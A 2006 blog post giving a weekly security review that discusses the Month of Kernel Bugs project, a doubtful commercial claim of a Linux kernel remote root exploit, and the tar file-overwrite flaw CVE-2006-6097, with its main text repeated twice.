Sunday, December 3. 2006
Security Week in Review (2006-11-26)
I'm back after a week off. I can't say anything much happened in the two weeks since my last update. In general that's a good thing, as when I have a busy week, most system administrators are going to also have a busy week. This time of year tends to be a bit on the slow side. I've spoken at length with various people I know about this. We're not sure why, but one of the theories is that the students are busy with finals at this time of year, so there are fewer student researchers practicing their craft until January.
Month of kernel bugs
The end of November also meant the end of the Month of Kernel Bugs project. If you've not heard of this project, don't feel bad. It turned out to be mostly unexciting. A few months back there was an effort called the Month of Browser Bugs. This effort proved very fruitful and found many dangerous flaws. I think this is understandable given the complexity of rendering all the various HTML bits. Kernels it seems are a bit harder to find meaningful exploits for. 11 of the 30 affected the Linux kernel, none were very dangerous. A number of the flaws were for third party windows drivers, which leads me to believe the project had to search to find 30 of these.
Kernel remote root?
I ran across this story about a potential Linux kernel remote root exploit. I'm hesitant to believe this story as anything more than an attempt to extort more money out of potential customers. Even if this is real, it begs the question: is handling such information in this way ethical? The company in question, Digital Armaments, seems to have a business model based on scaring people into subscribing to their service.
If there is a market for this service (which I doubt), who am I to say an organization shouldn't make money off of it? In the same respect though, not reporting an issue like this in a responsible manner places a great number of people at risk. If I was going to come up with an analogy, this would be like an automobile repair shop telling car owners their cars may explode in a ball of fire, but only they know how to fix it. I suspect in the real world there would be a great deal of outcry over such behavior.
tar
The only vulnerability that appeared in the last two weeks I feel is worth noting is a tar issue which allows a malicious tar archive to overwrite arbitrary files (CVE-2006-6097). I mention this as there has been a fair amount of bantor regarding this flaw. There are a number of people who want to consider this issue to be more than it is. I admit that in theory, this issue seems to be a big deal. If I untar an archive, it should not write outside of the current directory. I like to use an issue such as this to point out the difference between theory and practice.
In theory, this flaw could allow an attacker to overwrite any file I have access to. That means if I'm root, the entire machine could be compromised. If I'm a normal user, they could modify my .bashrc file, or various other files that are parsed upon program execution. This could theoretically let an attacker take control of my machine.
In practice however, I don't see how this issue is worth making a fuss over. First I have to acquire a malicious tar archive. I then have to try to unarchive it. The creator of the archive would have to know enough about my environment to ensure that a useful file is overwritten. This means that any real attack is going to target a specific victim. Right now in the world of security, if someone is going to target a victim, there are better and easier ways to do so than this. The real threat is mass attacks. Something that can compromise thousands of user by visiting a web page or receiving an email. Far too often I see people obsess over a small issue like this while ignoring the fact that their web browser is full of unfixed dangerous holes.
That's all for this week, hopefully there's nothing to talk about next week, my nethack skills are getting rusty
Month of kernel bugs
The end of November also meant the end of the Month of Kernel Bugs project. If you've not heard of this project, don't feel bad. It turned out to be mostly unexciting. A few months back there was an effort called the Month of Browser Bugs. This effort proved very fruitful and found many dangerous flaws. I think this is understandable given the complexity of rendering all the various HTML bits. Kernels it seems are a bit harder to find meaningful exploits for. 11 of the 30 affected the Linux kernel, none were very dangerous. A number of the flaws were for third party windows drivers, which leads me to believe the project had to search to find 30 of these.
Kernel remote root?
I ran across this story about a potential Linux kernel remote root exploit. I'm hesitant to believe this story as anything more than an attempt to extort more money out of potential customers. Even if this is real, it begs the question: is handling such information in this way ethical? The company in question, Digital Armaments, seems to have a business model based on scaring people into subscribing to their service.
If there is a market for this service (which I doubt), who am I to say an organization shouldn't make money off of it? In the same respect though, not reporting an issue like this in a responsible manner places a great number of people at risk. If I was going to come up with an analogy, this would be like an automobile repair shop telling car owners their cars may explode in a ball of fire, but only they know how to fix it. I suspect in the real world there would be a great deal of outcry over such behavior.
tar
The only vulnerability that appeared in the last two weeks I feel is worth noting is a tar issue which allows a malicious tar archive to overwrite arbitrary files (CVE-2006-6097). I mention this as there has been a fair amount of bantor regarding this flaw. There are a number of people who want to consider this issue to be more than it is. I admit that in theory, this issue seems to be a big deal. If I untar an archive, it should not write outside of the current directory. I like to use an issue such as this to point out the difference between theory and practice.
In theory, this flaw could allow an attacker to overwrite any file I have access to. That means if I'm root, the entire machine could be compromised. If I'm a normal user, they could modify my .bashrc file, or various other files that are parsed upon program execution. This could theoretically let an attacker take control of my machine.
In practice however, I don't see how this issue is worth making a fuss over. First I have to acquire a malicious tar archive. I then have to try to unarchive it. The creator of the archive would have to know enough about my environment to ensure that a useful file is overwritten. This means that any real attack is going to target a specific victim. Right now in the world of security, if someone is going to target a victim, there are better and easier ways to do so than this. The real threat is mass attacks. Something that can compromise thousands of user by visiting a web page or receiving an email. Far too often I see people obsess over a small issue like this while ignoring the fact that their web browser is full of unfixed dangerous holes.
That's all for this week, hopefully there's nothing to talk about next week, my nethack skills are getting rusty
Calendar
|
December '06 |
|
||||
| Sun | Mon | Tue | Wed | Thu | Fri | Sat |
| 1 | 2 | |||||
| 3 | 4 | 5 | 6 | 7 | 8 | 9 |
| 10 | 11 | 12 | 13 | 14 | 15 | 16 |
| 17 | 18 | 19 | 20 | 21 | 22 | 23 |
| 24 | 25 | 26 | 27 | 28 | 29 | 30 |
| 31 | ||||||
Quicksearch
Categories
Syndicate This Blog
Blog Administration
Powered by
